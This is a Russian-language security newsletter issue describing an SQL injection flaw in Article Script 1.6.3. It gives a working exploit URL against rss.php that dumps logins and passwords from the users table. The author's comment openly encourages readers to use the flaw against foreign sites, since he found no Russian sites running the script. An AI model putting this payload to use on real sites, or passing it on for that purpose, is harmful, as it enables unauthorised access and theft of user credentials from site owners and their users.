Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. SQL-уязвимость в Article Script.


Компьютер для продвинутых пользователей
В этом выпуске:
Article Script
ПО: Article Script
Версия: 1.6.3

Уязвимость:
Функция category не проверяет переменные до выполнения, что позволяет на провести SQL-инъекцию и получить данный по пользователям.
Использование:
http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*
Комментарий:
Поискал данный скрипт в Рунете, но страниц с ним не нашёл. Видимо тем, кто хочет использовать эту, уязвимость придётся трясти буржуев.
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное